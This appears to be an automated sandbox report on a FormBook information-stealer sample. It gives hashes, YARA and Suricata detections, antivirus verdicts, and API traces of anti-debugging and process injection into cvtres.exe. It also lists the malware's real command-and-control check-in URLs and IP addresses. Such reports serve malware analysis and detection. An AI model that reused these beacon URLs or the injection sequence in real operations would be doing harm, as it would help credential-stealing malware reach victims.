Summary | ZeroBOX

vbc.exe

Formbook AntiDebug PE File PE32 .NET EXE AntiVM
Category Machine Started Completed
FILE s1_win7_x6403_us July 6, 2022, 9:33 a.m. July 6, 2022, 9:41 a.m.
Size 375.2KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 4c5903eb4a5bb90549d95a65df83c607
SHA256 d68fa1001c7c79b3a4c142875ded35be6b07025eabe4b6ad576c1c3d11054ac8
CRC32 BDE9F3DB
ssdeep 6144:jHGStcllTbcz30z2hWRiY8UQieOpl6DCLysmdeyL71Hq:qSSlp23WiZUQiNl6DCLyrK
PDB Path GZXKJDSJSD.pdb
Yara
  • IsPE32 - (no description)
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • Is_DotNET_EXE - (no description)
  • PE_Header_Zero - PE File Signature

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49168 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 104.21.74.241:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 104.21.74.241:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 104.21.74.241:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 3.64.163.50:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 3.64.163.50:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 3.64.163.50:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 3.64.163.50:80 2031088 ET HUNTING Request to .XYZ Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.103:49169 -> 199.59.243.220:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 199.59.243.220:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 199.59.243.220:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49169 -> 199.59.243.220:80 2031088 ET HUNTING Request to .XYZ Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 45.199.106.125:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 45.199.106.125:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 45.199.106.125:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 199.59.243.220:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 199.59.243.220:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 199.59.243.220:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 208.91.197.91:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 208.91.197.91:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 208.91.197.91:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 156.251.170.150:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 156.251.170.150:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 156.251.170.150:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 156.251.170.150:80 2031088 ET HUNTING Request to .XYZ Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 52.32.87.211:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 52.32.87.211:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 52.32.87.211:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
pdb_path GZXKJDSJSD.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET http://www.findkode.com/n8it/?t8o4n4p=XRaKY0b/Twn1itfyD/E5gBfdnCAcxmkkRwYqfANZ7Bii15s3PxLwLHSaNbWInT71XR8djyOA&jPj8q=Klh8
suspicious_features GET method with no useragent header suspicious_request GET http://www.sculpturen.xyz/n8it/?t8o4n4p=t/erL9YR2sLhwlcVeiWqg7uX+X8EuJMz9loPi5Ru7Ev0G5hwzHDmBKBBzZq55RwmrwV8HJvG&jPj8q=Klh8
suspicious_features GET method with no useragent header suspicious_request GET http://www.0532sme.com/n8it/?t8o4n4p=qaoZ79Tpz0q12XHVvwZL6iyRO9FVXvmsdm1G/iqD7XWn5r4rXZu1gNvUG5okbiskkeAiLaI2&jPj8q=Klh8
suspicious_features GET method with no useragent header suspicious_request GET http://www.battene.com/n8it/?t8o4n4p=McOQamL1QnHgmn9hApqC5E9PzDOj7OTmjo9oDMMsU9kn44WZO/cbeCQYQ2vNt+WuA2a67BFc&jPj8q=Klh8
suspicious_features GET method with no useragent header suspicious_request GET http://www.directbizlending.xyz/n8it/?t8o4n4p=JI8glnZ+T7+UylZ2b89MsJ6rlkOtfBC0nEEzYJdFcbriy8I0KlWbc6rU3MljMvExAEyTKMgf&jPj8q=Klh8
suspicious_features GET method with no useragent header suspicious_request GET http://www.driveubertexas.com/n8it/?t8o4n4p=IF5z/94puPD9ykWHJqUEwQcusln6W8beospXTN957V1iD4KFYIE6xqxPXAKrOEfXLTEkZmjL&jPj8q=Klh8
suspicious_features GET method with no useragent header suspicious_request GET http://www.fimacusa.net/n8it/?t8o4n4p=E+kQG3c6vbVFQNTOWHwoysd/3Wz4BdfLpjNdMipYl0pL497gaXDuUHPF3Fwc7FFHvRGPYqjF&jPj8q=Klh8
suspicious_features GET method with no useragent header suspicious_request GET http://www.crossfitlaquila.com/n8it/?t8o4n4p=vF0eAXKRgjVgiplGFBMXRLMjJGWC1I+g3Sok3U0+1QWyjvHg0fDP7AmGGw6M2ZUAM9xHIbEq&jPj8q=Klh8
suspicious_features GET method with no useragent header suspicious_request GET http://www.syzbf15.xyz/n8it/?t8o4n4p=mV2dZn7KCQE5F8iZdx/q2lEc9m15obLx50LA6yIckIyVq0JP986kRhMEla0PCiFRsojHaXj/&jPj8q=Klh8
request GET http://www.findkode.com/n8it/?t8o4n4p=XRaKY0b/Twn1itfyD/E5gBfdnCAcxmkkRwYqfANZ7Bii15s3PxLwLHSaNbWInT71XR8djyOA&jPj8q=Klh8
request GET http://www.sculpturen.xyz/n8it/?t8o4n4p=t/erL9YR2sLhwlcVeiWqg7uX+X8EuJMz9loPi5Ru7Ev0G5hwzHDmBKBBzZq55RwmrwV8HJvG&jPj8q=Klh8
request GET http://www.0532sme.com/n8it/?t8o4n4p=qaoZ79Tpz0q12XHVvwZL6iyRO9FVXvmsdm1G/iqD7XWn5r4rXZu1gNvUG5okbiskkeAiLaI2&jPj8q=Klh8
request GET http://www.battene.com/n8it/?t8o4n4p=McOQamL1QnHgmn9hApqC5E9PzDOj7OTmjo9oDMMsU9kn44WZO/cbeCQYQ2vNt+WuA2a67BFc&jPj8q=Klh8
request GET http://www.directbizlending.xyz/n8it/?t8o4n4p=JI8glnZ+T7+UylZ2b89MsJ6rlkOtfBC0nEEzYJdFcbriy8I0KlWbc6rU3MljMvExAEyTKMgf&jPj8q=Klh8
request GET http://www.driveubertexas.com/n8it/?t8o4n4p=IF5z/94puPD9ykWHJqUEwQcusln6W8beospXTN957V1iD4KFYIE6xqxPXAKrOEfXLTEkZmjL&jPj8q=Klh8
request GET http://www.fimacusa.net/n8it/?t8o4n4p=E+kQG3c6vbVFQNTOWHwoysd/3Wz4BdfLpjNdMipYl0pL497gaXDuUHPF3Fwc7FFHvRGPYqjF&jPj8q=Klh8
request GET http://www.crossfitlaquila.com/n8it/?t8o4n4p=vF0eAXKRgjVgiplGFBMXRLMjJGWC1I+g3Sok3U0+1QWyjvHg0fDP7AmGGw6M2ZUAM9xHIbEq&jPj8q=Klh8
request GET http://www.syzbf15.xyz/n8it/?t8o4n4p=mV2dZn7KCQE5F8iZdx/q2lEc9m15obLx50LA6yIckIyVq0JP986kRhMEla0PCiFRsojHaXj/&jPj8q=Klh8
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00700000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00820000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2340
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2340
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73942000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b80000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00512000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00555000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0053c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0051a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 24576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00546000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007b8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0054a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00547000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007b9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007bd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007be000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2340
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0053a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2588
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00820000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
section {u'size_of_data': u'0x0003f600', u'virtual_address': u'0x00002000', u'entropy': 7.665323705421399, u'name': u'.text', u'virtual_size': u'0x0003f594'} entropy 7.66532370542 description A section with a high entropy has been found
entropy 0.707112970711 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Used Formbook[m] rule Win_Trojan_Formbook_m_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2588
region_size: 176128
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000001fc
1 0 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZERèXƒè ‹ÈƒÀ<‹ÁƒÀ(ÿᐸº´ Í!¸LÍ!This program cannot be run in DOS mode. $v¨&YÆuYÆuYÆuBŠmuÆuBŠXuZÆuBŠ[uXÆuRichYÆuPELϦvJà  œàò°@°@.text šœ `
base_address: 0x00400000
process_identifier: 2588
process_handle: 0x000001fc
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 2588
process_handle: 0x000001fc
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZERèXƒè ‹ÈƒÀ<‹ÁƒÀ(ÿᐸº´ Í!¸LÍ!This program cannot be run in DOS mode. $v¨&YÆuYÆuYÆuBŠmuÆuBŠXuZÆuBŠ[uXÆuRichYÆuPELϦvJà  œàò°@°@.text šœ `
base_address: 0x00400000
process_identifier: 2588
process_handle: 0x000001fc
1 1 0
Process injection Process 2340 called NtSetContextThread to modify thread in remote process 2588
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4322016
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000200
process_identifier: 2588
1 0 0
Process injection Process 2340 resumed a thread in remote process 2588
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000200
suspend_count: 1
process_identifier: 2588
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2340
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2340
1 0 0

NtResumeThread

thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2340
1 0 0

CreateProcessInternalW

thread_identifier: 2592
thread_handle: 0x00000200
process_identifier: 2588
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000001fc
1 1 0

NtGetContextThread

thread_handle: 0x00000200
1 0 0

NtAllocateVirtualMemory

process_identifier: 2588
region_size: 176128
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000001fc
1 0 0

WriteProcessMemory

buffer: MZERèXƒè ‹ÈƒÀ<‹ÁƒÀ(ÿᐸº´ Í!¸LÍ!This program cannot be run in DOS mode. $v¨&YÆuYÆuYÆuBŠmuÆuBŠXuZÆuBŠ[uXÆuRichYÆuPELϦvJà  œàò°@°@.text šœ `
base_address: 0x00400000
process_identifier: 2588
process_handle: 0x000001fc
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2588
process_handle: 0x000001fc
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 2588
process_handle: 0x000001fc
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4322016
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000200
process_identifier: 2588
1 0 0

NtResumeThread

thread_handle: 0x00000200
suspend_count: 1
process_identifier: 2588
1 0 0
Bkav W32.AIDetectNet.01
Lionic Trojan.MSIL.Agensla.i!c
Elastic malicious (high confidence)
DrWeb Trojan.Siggen18.19484
FireEye Generic.mg.4c5903eb4a5bb905
Cylance Unsafe
K7AntiVirus Trojan ( 0058b03a1 )
Alibaba Trojan:MSIL/Kryptik.93c2c93f
K7GW Trojan ( 0058b03a1 )
CrowdStrike win/malicious_confidence_100% (W)
BitDefenderTheta Gen:NN.ZemsilF.34786.xm2@amSDPYp
Cyren W32/MSIL_Kryptik.HJO.gen!Eldorado
Symantec Trojan Horse
ESET-NOD32 a variant of MSIL/Kryptik.ADNS
TrendMicro-HouseCall TROJ_GEN.R002H0CG522
Paloalto generic.ml
Kaspersky HEUR:Trojan-PSW.MSIL.Agensla.gen
BitDefender Trojan.GenericKD.49308742
Avast Win32:PWSX-gen [Trj]
Rising Stealer.Agensla!8.13266 (CLOUD)
McAfee-GW-Edition Artemis!Trojan
SentinelOne Static AI - Malicious PE
Emsisoft Trojan.GenericKD.49308742 (B)
Ikarus Trojan.MSIL.PSW
Avira TR/AD.Swotter.zdezs
Microsoft Trojan:MSIL/FormBook.NZT!MTB
GData Win32.Trojan-Stealer.FormBook.CW8M2S
Cynet Malicious (score: 99)
AhnLab-V3 Trojan/Win.Injection.C5194159
Acronis suspicious
McAfee Artemis!4C5903EB4A5B
Malwarebytes Malware.AI.4224058029
APEX Malicious
MAX malware (ai score=99)
MaxSecure Trojan.Malware.300983.susgen
Fortinet MSIL/Kryptik.ADNS!tr
AVG Win32:PWSX-gen [Trj]
Cybereason malicious.8c7e34
dead_host 192.168.56.103:49171
dead_host 43.138.169.174:80
dead_host 192.168.56.103:49172